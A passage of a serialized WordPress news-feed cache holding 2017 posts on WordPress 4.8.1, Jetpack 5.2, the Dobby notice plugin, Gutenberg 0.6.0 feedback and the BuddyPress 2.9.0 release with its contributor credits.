growth</h2>\n<p>The dashboard events widget in WordPress 4.8 displays local, upcoming WordPress events for the logged in user. The events listed in this widget are pulled from the <a href="https://www.meetup.com/pro/wordpress/">meetup chapter program</a>, as well as the <a href="https://central.wordcamp.org/schedule">WordCamp schedule</a>.</p>\n<p>This widget provides greater visibility of official WordPress events, and encourages community involvement in these events. It’s safe to say that the widget has achieved its goals admirably — since WordPress 4.8 was released a little over a month ago, 31 new meetup groups have been formed with 15,647 new members across the whole program. This is compared to 19 new groups and only 7,071 new members in the same time period last year.</p>\n<p>You can find a local meetup group to join <a href="https://www.meetup.com/pro/wordpress/">on meetup.com</a>, and if you would like to get involved in organizing events for your community, you can find out more about the inner workings of the program <a href="https://make.wordpress.org/community/meetups/">on the Community Team site</a> or by joining the #community-events channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>.</p>\n<h2>WordPress 4.8.1 due for imminent release</h2>\n<p>WordPress 4.8 cycle’s first maintenance release will be published in the coming week, more than a month after 4.8 was released. This release fix some important issues in WordPress core and the majority of users will find that their sites will update to this new version automatically.</p>\n<p>If you would like to help out by testing this release before it goes live, you can follow the <a href="https://make.wordpress.org/core/handbook/testing/beta/">beta testing guide</a> for WordPress core. To get further involved in building WordPress core, jump into the #core channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>, and follow <a href="https://make.wordpress.org/core/">the Core team blog</a>.</p>\n<hr />\n<h2>Further reading:</h2>\n<ul>\n<li>The WordPress mobile apps have been updated with <a href="https://en.blog.wordpress.com/2017/07/24/a-brand-new-editor-for-the-wordpress-mobile-apps/">a brand new text editor</a>.</li>\n<li>In a recent push to encourage WordPress users to upgrade their PHP versions, two features have been proposed &#8211; one <a href="https://core.trac.wordpress.org/ticket/41191">to provide a notice to users</a> and another to <a href="https://core.trac.wordpress.org/ticket/40934">allow PHP version requirements to be specified by plugins and themes</a>.</li>\n<li>John Maeda wrote <a href="https://make.wordpress.org/design/2017/07/14/whywordpress2/">a great post</a> celebrating the freedom that WordPress offers.</li>\n<li>Gutenberg, the new text editor for WordPress, is <a href="https://make.wordpress.org/core/2017/07/28/whats-new-in-gutenberg-28th-july/">in continual development</a> — everyone is invited to <a href="https://make.wordpress.org/test/handbook/call-for-testing/gutenberg-testing/">test it out</a>.</li>\n<li>The WordPress Meta team is starting <a href="https://make.wordpress.org/meta/2017/07/26/experiment-wordcamp-org-bug-scrubs/">a new initiative</a> to bring the community together to focus on fixing bugs across the WordCamp.org network.</li>\n<li>Volunteer applications for WordCamp US <a href="https://2017.us.wordcamp.org/2017/08/01/wcus-needs-you-volunteer-applications-are-now-open/">are now open</a>.</li>\n</ul>\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href="https://make.wordpress.org/community/month-in-wordpress-submissions/">submit it here</a>.</em></p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 02 Aug 2017 07:50:14 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:42;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:74:"WPTavern: Jetpack 5.2 Brings Major Improvements to the Contact Form Module";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73816";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:85:"https://wptavern.com/jetpack-5-2-brings-major-improvements-to-the-contact-form-module";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2280:"<p>Jetpack&#8217;s <a href="https://jetpack.com/support/contact-form/" target="_blank">Contact Form module</a> hasn&#8217;t seen too many changes since its first release (<a href="https://jetpack.com/2012/04/24/jetpack-1-3-released-contact-forms/" target="_blank">version 1.3</a>) in 2012. It is easily one of the most compelling features included in the plugin and has long been overdue for a refresh.</p>\n<p>Today&#8217;s <a href="https://jetpack.com/2017/08/01/jetpack-5-2-new-contact-form/" target="_blank">5.2 release</a> brings major improvements to the Contact Form module. Previously, Jetpack launched the form builder as a small popup in the post editor. The refreshed design brings form editing and previewing into the main content area where users can customize fields and labels and re-order them using drag-and-drop. At the bottom of the form users can click a button to add new fields. These interface updates bring the module more in line with other leading contact form plugins.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/jetpack-updated-contact-form.png?ssl=1"><img /></a></p>\n<p>Jetpack 5.2 also improves the recommended features list for new users with better explanations of the features and benefits of each. The release also reduces the plugin&#8217;s zip file by 500kb and reduces the code required to run the Comment Likes module.</p>\n<p>Comment Likes were introduced in <a href="https://jetpack.com/2017/07/05/jetpack-5-1-comment-likes/" target="_blank">version 5.1</a>, offering users a new way of interacting within the comments. Hovering over the number of likes will display the Gravatars of the users who liked the comment. The feature does not require Jetpack Comments to be enabled. The two work independently of each other.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/comment-likes.png?ssl=1"><img /></a></p>\n<p>In attempting to add Comment Likes to the Tavern, we found the module has a conflict with the <a href="https://wordpress.org/plugins/epoch/" target="_blank">Epoch</a> commenting plugin plugin. We have temporarily disabled the plugin until compatibility for Comment Likes is added. We are testing the module to see how it affects interaction in the comments of our posts.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 02 Aug 2017 03:28:56 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:43;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:67:"WPTavern: A Fix for WordPress Weekly Subscribers Using Pocket Casts";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73803";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:78:"https://wptavern.com/a-fix-for-wordpress-weekly-subscribers-using-pocket-casts";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2140:"<p>Last week, you may have noticed that the Tavern was intermittently offline and generating errors. We&#8217;ve been experiencing technical issues for the past several months but they peaked last week. After working with Bluehost, they migrated the site from a VPS, to a Dedicated Server that has more powerful hardware.</p>\n<p>Since the migration, we&#8217;ve noticed the site is more responsive, loads quicker, and doesn&#8217;t generate any errors. If you see an error or experience problems accessing the site, please report them to us <a href="https://twitter.com/wptavern">on Twitter</a>.</p>\n<p>Last month, a number of WordPress Weekly listeners <a href="https://wptavern.com/episodes-271-280-of-wordpress-weekly-are-now-available">reported</a> that they were unable to access recent episodes through Apple’s Podcasting app, Stitcher, and other applications. After reconverting the MP3s and getting them to work on Apple&#8217;s Podcasting app, I continued to receive reports from <a href="https://www.shiftyjelly.com/pocketcasts/">Pocket Casts</a> subscribers that the files were not available.</p>\n<p>After confirming the issue, I reconverted the MP3s three times with different conversion software. I also used tools to diagnose and confirm that the files were not corrupted. Despite my efforts, Pocket Casts continued to encounter problems accessing the files.</p>\n<p>I was running out of options until Josh Eby reported that, deleting the app from his device, reinstalling it, and re-syncing his library fixed the problem.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">So I decided to delete all of my app data for pocket casts and re-sync my library. I downloaded them again and it worked for 280&#8230;</p>\n<p>&mdash; Josh Eby (@josheby) <a href="https://twitter.com/josheby/status/892130949319847936">July 31, 2017</a></p></blockquote>\n<p></p>\n<p>I followed his advice and indeed, recent episodes of WordPress Weekly are available again in Pocket Casts. If you&#8217;re subscribed to the show using Pocket Casts and can not access episodes 280-282, please consider going through the steps listed above.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 01 Aug 2017 19:09:46 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:44;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:78:"WPTavern: New Dobby Plugin Captures and Hides Unwanted WordPress Admin Notices";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73783";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:89:"https://wptavern.com/new-dobby-plugin-captures-and-hides-unwanted-wordpress-admin-notices";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3482:"<p>With the right combination of plugins and events, the WordPress admin area can quickly become a confusing mess of notices. WordPress&#8217; notification system is often abused and overused by plugin authors who want to inject upsells and announcements into the admin. These can stack up like a pile of junk mail vying for users&#8217; attention when they are trying to manage their sites. Ultimately, notice overload decreases users&#8217; enjoyment of the software and may contribute to making it a chore to log into WordPress.</p>\n<p>The new <a href="https://wordpress.org/plugins/wp-dobby/" target="_blank">Dobby plugin</a> from <a href="https://tfrommen.de" target="_blank">Thorsten Frommen</a> attempts to solve this problem by capturing and hiding unwanted admin notices. Frommen, a WordPress engineer at Inpsyde, was inspired to create the plugin after he saw a recent tweet from Torsten Landsiedel showing &#8220;Everyday life in the WordPress dashboard.&#8221;</p>\n<blockquote class="twitter-tweet">\n<p lang="de" dir="ltr">Alltag im WordPress Dashboard. <a href="https://t.co/lofO7544uL">pic.twitter.com/lofO7544uL</a></p>\n<p>&mdash; Torsten Landsiedel (@zodiac1978) <a href="https://twitter.com/zodiac1978/status/886646392730648577">July 16, 2017</a></p></blockquote>\n<p></p>\n<p>Dobby rolls up WordPress admin notices and keeps them hidden behind a &#8220;Reveal&#8221; button that toggles a color-coded list of notices into view. It captures all the notices that are printed via the admin notice hooks, such as <code>network_admin_notices</code>, <code>user_admin_notices</code>, <code>admin_notices</code> and <code>all_admin_notices</code>. Dobby will post an admin notice if any notices have been captured.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/dobby.gif?ssl=1"><img /></a></p>\n<p>Frommen said the target audience for his plugin is &#8220;all the people sick and tired of too many admin notifications, which are oftentimes of no real value at all.&#8221; Dobby has a filter available for users to define what &#8220;too many&#8221; means for themselves. The <a href="https://github.com/tfrommen/Dobby" target="_blank">plugin&#8217;s GitHub repository</a> has examples of how to use the Dobby filter threshold, which lets users customize the minimum number of admin notices required to trigger Dobby to start hiding them.</p>\n<p>&#8220;It certainly is possible that people may miss (critical) messages with Dobby being active,&#8221; Frommen said. &#8220;However, Dobby is smart enough to style his admin notice according to the most critical one captured. This means that Dobby&#8217;s notice will have error styling if there was an error notice captured. If the most critical one was a warning, that’s what Dobby’s notice will be as well. Otherwise, it’s an info notice.&#8221;</p>\n<p>Within the first 10 minutes of requesting translations after announcing that Dobby was on WordPress.org, Frommen received German and Dutch translations for the plugin. The plugin UI has only two strings, which makes it a simple, 5-minute translation job.</p>\n<p>Frommen is considering adding a filter for people to define what kind of notices they would like Dobby to capture. He welcomes suggestions, <a href="https://github.com/tfrommen/Dobby" target="_blank">contributions on GitHub</a>, and <a href="https://translate.wordpress.org/projects/wp-plugins/wp-dobby" target="_blank">more translations</a> from the WordPress community.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 01 Aug 2017 18:30:50 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:45;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:105:"WPTavern: Gutenberg 0.6.0 Changes Text/Paragraph Block Behavior, Adds New Cover Text and Read More Blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73735";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:114:"https://wptavern.com/gutenberg-0-6-0-changes-textparagraph-block-behavior-adds-new-cover-text-and-read-more-blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:8165:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/07/paragraph.jpg?ssl=1"><img /></a>photo credit: A Tiny Break From The Rain <a href="http://www.flickr.com/photos/78814955@N00/34165889514"><img src="https://s.w.org/images/core/emoji/2.3/72x72/1f430.png" alt="🐰" class="wp-smiley" />Adventures In Wonderland &#038; Through The Looking Glass<img src="https://s.w.org/images/core/emoji/2.3/72x72/1f430.png" alt="🐰" class="wp-smiley" /></a> &#8211; <a href="https://creativecommons.org/licenses/by-nc-nd/2.0/">(license)</a>\n<p><a href="https://make.wordpress.org/core/2017/07/28/whats-new-in-gutenberg-28th-july/" target="_blank">Gutenberg 0.6.0</a> was released over the weekend with significant changes to the way paragraphs are created within text blocks. In previous versions of the plugin, pressing enter would create a line break inside a paragraph. This release modifies the behavior of the text/paragraph block to <a href="https://github.com/WordPress/gutenberg/pull/1989" target="_blank">split the block when a user presses enter</a>. (Line breaks can still be created by pressing SHIFT+ENTER.)</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/07/gutenberg-new-paragraph.png?ssl=1"><img /></a></p>\n<p>This update is a small improvement in that it hides the text formatting bar when you continue on with a new paragraph, but the slightest scroll or move of the mouse brings it back into view. Contributors are <a href="https://github.com/WordPress/gutenberg/pull/1812#issuecomment-314045186" target="_blank">considering adding a buffer</a> at some point that would only trigger the UI after the mouse moves a certain number of pixels.</p>\n<p>Unfortunately, the &#8220;New Paragraph&#8221; placeholder text is intrusive and distracting. It is a constant, unwanted reminder of the structure of your document, which is not helpful if you are trying to stay in the flow of writing.</p>\n<p>Gutenberg may improve the experience of vertically stacking differently formatted content, but the writing experience still needs a great deal of work before it can be comparable to what WordPress currently provides. The new editor still gets in the way of writing, instead of silently enabling it.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">I love Gutenberg so far, but this is too many dongles to display at the moment of focusing on writing. <a href="https://t.co/Xpb19KgG01">pic.twitter.com/Xpb19KgG01</a></p>\n<p>&mdash; Daniel Bachhuber (@danielbachhuber) <a href="https://twitter.com/danielbachhuber/status/889944454643064832">July 25, 2017</a></p></blockquote>\n<p></p>\n<p>After browsing the Gutenberg repository&#8217;s 400+ issues queue, it&#8217;s clear that contributors are aware of the jarring experience for writers and are working to improve it in every release. However, the beta software is not anywhere near ready for long-form writing, as the intrusive UI places too many cognitive demands on the writer.</p>\n<h3>New Blocks in 0.6.0: &#8220;Cover Text&#8221; and &#8220;Read More&#8221;</h3>\n<p>This release introduces a <a href="https://github.com/WordPress/gutenberg/pull/2036" target="_blank">new &#8220;Cover Text&#8221; block</a> that includes background, text color, and full-width options. Color swatches are available in the sidebar block options and contributors are planning to add filters to allow plugin and theme authors to supply a custom palette.</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/07/cover-text.png?ssl=1"><img /></a></p>\n<p>Version 0.6.0 also includes a <a href="https://github.com/WordPress/gutenberg/pull/1440" target="_blank">new &#8220;Read More&#8221; block</a> that inserts a read more link with instant visual feedback within the content.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/07/read-more-block.png?ssl=1"><img /></a></p>\n<p>This release also brings several improvements to existing blocks, autosaving for drafts, and initial support for undo/redo keyboard functions.</p>\n<h3>Gutenberg&#8217;s Negative Reviews are Piling Up on WordPress.org</h3>\n<p>Gutenberg contributors are regularly shipping weekly releases, with many features added as bare bones placeholders that will be iterated on in future releases. New blocks are being developed simultaneously with core editing features. Some testers have <a href="https://wptavern.com/gutenberg-0-5-0-adds-new-verse-block-for-poetry-and-a-new-display-for-recent-blocks#comment-224944" target="_blank">bemoaned the proliferation of blocks</a> that may seldom be used while the basic writing experience continues to lag behind.</p>\n<p><a href="https://wordpress.org/support/plugin/gutenberg/reviews/" target="_blank">Gutenberg plugin reviews</a> are currently averaging 2.3 out of 5 stars on WordPress.org, with 46 1-star reviews, 21 5-star reviews, and a handful in between. While the reviews are not a full representation of all who are testing Gutenberg, they provide a small window into users&#8217; current expectations, delights, and frustrations with the editor. Gutenberg contributors are monitoring these forums and using the feedback to create bug reports.</p>\n<p>Many reviewers have left 1-star ratings, begging WordPress to keep it as a plugin instead of adding it to core. One reviewer even took to verse to further elaborate on his one-star review titled &#8220;<a href="https://wordpress.org/support/topic/catastophe-how-to-destroy-wordpress-in-2-weeks/" target="_blank">A Visit from St. Gutenberg</a>&#8221; with an adaptation of the classic poem &#8220;<a href="https://en.wikipedia.org/wiki/A_Visit_from_St._Nicholas" target="_blank">The Night Before Christmas</a>:&#8221;</p>\n<blockquote><p>\nA bundle of blocks he had flung on his back,<br />\nAnd he looked like a coder just opening his pack.</p>\n<p>His eyes—how they twinkled! his dimples, how merry!<br />\n“Who needs MCE, when we have blocks and so many?”</p></blockquote>\n<p>Many reviewers find Gutenberg to be &#8220;unnecessarily complex&#8221; for actions that were previously easy to perform in the editor.</p>\n<p>&#8220;I have several websites &#8211; two are for business and include blogs (technical posts, how-tos, etc),&#8221; @quantaweb <a href="https://wordpress.org/support/topic/please-make-it-a-plugin-not-part-of-core/" target="_blank">said</a>. &#8220;I’m also the editor of a literary magazine. This doesn’t work for any of these sites. It’s not easier to write blogs with it, and it does nothing to ease the work of importing critical essays and poetry into the literary magazine — and formatting them — either&#8230;Gutenberg is unnecessarily complex.&#8221;</p>\n<p>Some of the 1-star reviews come laced with threats to move to another CMS and splinter the WordPress community if Gutenberg is included in core.</p>\n<p>&#8220;By removing all the traditional editor buttons and trying to make a minimalist design the usefulness and ease of use has been drastically reduced,&#8221; @ovann86 <a href="https://wordpress.org/support/topic/great-example-of-why-developers-are-not-ux-experts/" target="_blank">said</a>. &#8220;I found myself either not being able to do very basic content management or having to click, hover and look for the buttons – instead of them being visible and available immediately&#8230;If this was made core I would likely be forced to move to another CMS.&#8221;</p>\n<p>Early testing of beta software is not for everyone, as many are unable to look past the initial bugs and clunky implementations to see the potential of the editor to improve WordPress&#8217; severely fragmented content creation experience. Matt Mullenweg jumped onto the forums as recently as two weeks ago to <a href="https://wordpress.org/support/topic/not-ready-for-prime-time-14/#post-9316327" target="_blank">respond to testers&#8217; feedback</a>.</p>\n<p>&#8220;We definitely agree it’s not ready for prime time yet, that’s why we’re doing extensive public testing and iteration while it’s in the plugin phase,&#8221; Mullenweg said. &#8220;Thank you for your feedback and I hope you try it again in a few months with an open mind.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 31 Jul 2017 23:26:18 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:46;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:50:"BuddyPress: BuddyPress 2.9.0 – ‘La Lombarda’";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:32:"https://buddypress.org/?p=267251";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:60:"https://buddypress.org/2017/07/buddypress-2-9-0-la-lombarda/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6217:"<p>BuddyPress is happy to announce the immediate availability of it&#8217;s latest release 2.9 &#8216;La Lombarda&#8217; <a href="https://en-gb.wordpress.org/plugins/buddypress/2.9.0">available for download </a> or updatable from your WordPress install plugin directory.</p>\n<p>This release features a range of improvements and updates for both core functionality and templates.</p>\n<p><strong>Amongst a range of improvements and enhancements:</strong></p>\n<ul>\n<li>BP legacy templates are updated for aria labels to bring a vastly improved level of accessibility to layouts.</li>\n<li>In line with current practises anchor title attributes are replaced with an enhanced version usable for all devices, BP Tooltips now provides pop up title requirements on mouse hover or keyboard focus.</li>\n<li>Provide the capability to edit the Group slug: now site admins may edit the group name and the permalink in the dashboard.</li>\n<li>Prevent group invites being sent to users that have already received one.</li>\n<li>Uploading of profile images in mobile devices improved as well as better handling of files with non ASCII characters.</li>\n<li>Email links to private message threads now re-direct logged out users to the login screen, logged in users are directed to message thread.</li>\n<li>New template tag <code>bp_group_link()</code></li>\n<li>Add an order_by parameter for activity queries.</li>\n</ul>\n<p>You can see the full set of changes on our codex page <a href="https://codex.buddypress.org/releases/version-2-9-0/">Version 2.9.0</a></p>\n<p><strong>Comments &amp; feedback</strong><br />\nPlease report any issues to the <a href="https://buddypress.org/support/">Buddypress Support Forum</a> or open a ticket on our <a href="https://buddypress.trac.wordpress.org/">Trac development home</a>.</p>\n<p><strong>Contributors</strong><br />\nBuddypress is a volunteer project and the core team acknowledges the contributions from everyone listed below that helped to bring 2.9 to the community.</p>\n<ul class="wp-credits-list">\n<li><a href="https://profiles.wordpress.org/55don/"> 55don</a>, </li>\n<li><a href="https://profiles.wordpress.org/aaronoftomorrow/"> AaronOfTomorrow</a>, </li>\n<li><a href="https://profiles.wordpress.org/allianse/"> allianse</a>, </li>\n<li><a href="https://profiles.wordpress.org/antonioeatgoat/"> Antonio Mangiacapra (antonioeatgoat)</a>, </li>\n<li><a href="https://profiles.wordpress.org/benjlipchak/"> Benj (benjlipchak)</a>, </li>\n<li><a href="https://profiles.wordpress.org/boonebgorges/"> Boone B Gorges (boonebgorges)</a>, </li>\n<li><a href="https://profiles.wordpress.org/bhargavbhandari90/"> Bunty (bhargavbhandari90)</a>, </li>\n<li><a href="https://profiles.wordpress.org/sbrajesh/"> Brajesh Singh (sbrajesh)</a>, </li>\n<li><a href="https://profiles.wordpress.org/needle/"> Christian Wach (needle)</a>, </li>\n<li><a href="https://profiles.wordpress.org/brandonliles/"> brandonliles</a>, </li>\n<li><a href="https://profiles.wordpress.org/danbp/"> danbp</a>, </li>\n<li><a href="https://profiles.wordpress.org/dcavins/"> David Cavins (dcavins)</a>, </li>\n<li><a href="https://profiles.wordpress.org/dkelm/"> dkelm</a>, </li>\n<li><a href="https://profiles.wordpress.org/dsar/"> dsar</a>, </li>\n<li><a href="https://profiles.wordpress.org/dsided/"> dsided</a>, </li>\n<li><a href="https://profiles.wordpress.org/henry.wright"> Henry Wright (henry.wright)</a>, </li>\n<li><a href="https://profiles.wordpress.org/hnla/"> Hugo (hnla)</a>, </li>\n<li><a href="https://profiles.wordpress.org/idofri/"> Ido Friedlander (idofri)</a>, </li>\n<li><a href="https://profiles.wordpress.org/uscore713/"> Jay (uscore713)</a>, </li>\n<li><a href="https://profiles.wordpress.org/johnbillion/"> John Blackbourn (johnbillion)</a>, </li>\n<li><a href="https://profiles.wordpress.org/johnjamesjacoby/"> John James Jacoby (johnjamesjacoby)</a>, </li>\n<li><a href="https://profiles.wordpress.org/juanho/"> Juanho</a>, </li>\n<li><a href="https://profiles.wordpress.org/lakrisgubben/"> lakrisgubben</a>, </li>\n<li><a href="https://profiles.wordpress.org/Offereins"> Laurens Offereins (Offereins)</a>, </li>\n<li><a href="https://profiles.wordpress.org/lne1030/"> lne1030</a>, </li>\n<li><a href="https://profiles.wordpress.org/lenasterg/"> lenasterg</a>, </li>\n<li><a href="https://profiles.wordpress.org/maniou/"> Maniou</a>, </li>\n<li><a href="https://profiles.wordpress.org/imath/"> Mathieu Viet (imath)</a>, </li>\n<li><a href="https://profiles.wordpress.org/mercime/"> mercime</a>, </li>\n<li><a href="https://profiles.wordpress.org/tw2113/"> Michael Beckwith (tw2113)</a>, </li>\n<li><a href="https://profiles.wordpress.org/mikegillihan/"> Mike Gillihan (MikeGillihan)</a>, </li>\n<li><a href="https://profiles.wordpress.org/milindmore22/"> Milind More  (milindmore22)</a>, </li>\n<li><a href="https://profiles.wordpress.org/modemlooper/"> modemlooper</a>, </li>\n<li><a href="https://profiles.wordpress.org/mrjarbenne/"> mrjarbenne</a>, </li>\n<li><a href="https://profiles.wordpress.org/nicolaskulka/"> Nicolas Kulka (NicolasKulka)</a>, </li>\n<li><a href="https://profiles.wordpress.org/oelita/"> Oelita</a>, </li>\n<li><a href="https://profiles.wordpress.org/DJPaul/"> Paul Gibbs (DJPaul)</a>, </li>\n<li><a href="https://profiles.wordpress.org/pareshradadiya/"> paresh.radadiya (pareshradadiya)</a>, </li>\n<li><a href="https://profiles.wordpress.org/r-a-y/"> r-a-y</a>, </li>\n<li><a href="https://profiles.wordpress.org/espellcaste/"> Renato Alves (espellcaste)</a>, </li>\n<li><a href="https://profiles.wordpress.org/rianrietveld/"> Rian Rietveld (rianrietvelde)</a>, </li>\n<li><a href="https://profiles.wordpress.org/elhardoum/"> Samuel Elh (elhardoum)</a>, </li>\n<li><a href="https://profiles.wordpress.org/seventhqueen/"> seventhqueen</a>, </li>\n<li><a href="https://profiles.wordpress.org/slaffik/"> Slava Abakumov (slaffik)</a>, </li>\n<li><a href="https://profiles.wordpress.org/netweb/"> Stephen Edgar (netweb)</a>, </li>\n<li><a href="https://profiles.wordpress.org/vishalkakadiya/"> Vishal Kakadiya (vishalkakadiya)</a>, 